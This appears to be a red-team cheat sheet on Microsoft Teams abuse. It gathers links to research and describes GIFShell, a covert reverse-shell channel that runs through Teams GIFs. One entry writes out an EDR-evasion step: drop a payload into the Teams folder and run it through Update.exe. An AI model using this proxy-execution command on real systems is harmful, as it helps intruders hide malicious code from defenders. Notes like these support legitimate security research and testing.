Microsoft Teams Abuse

https://mrd0x.com/microsoft-teams-abuse/

#teams #abuse #redteam

Executing Code Using Microsoft Teams Updater

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/executing-code-using-microsoft-teams-updater/

#teams #redteam #research

Bypass EDR with Microsoft Teams

Copy payload into:
%userprofile%\AppData\Local\Microsoft\Teams\current\

Then:
%userprofile%\AppData\Local\Microsoft\Teams\Update.exe --processStart payload.exe --process-start-args "args"

#edr #evasion #teams

⚔️ Microsoft Teams C2 — Covert Attack Chain Utilizing GIFShell

Seven different insecure design elements/vulnerabilities present in Microsoft Teams, can be leveraged by an attacker, to execute a reverse shell between an attacker and victim, where no communication is directly exchanged between an attacker and a victim, but is entirely piped through malicious GIFs sent in Teams messages, and Out of Bounds (OOB) lookups of GIFs conducted by Microsoft’s own servers. This unique C2 infrastructure can be leveraged by sophisticated threat actors to avoid detection by EDR and other network monitoring tools. Particularly in secure network environments, where Microsoft Teams might be one of a handful of allowed, trusted hosts and programs, this attack chain can be particularly devastating.

Source:
https://medium.com/@bobbyrsec/gifshell-covert-attack-chain-and-c2-utilizing-microsoft-teams-gifs-1618c4e64ed7

#c2 #teams #gifshell #edr #redteam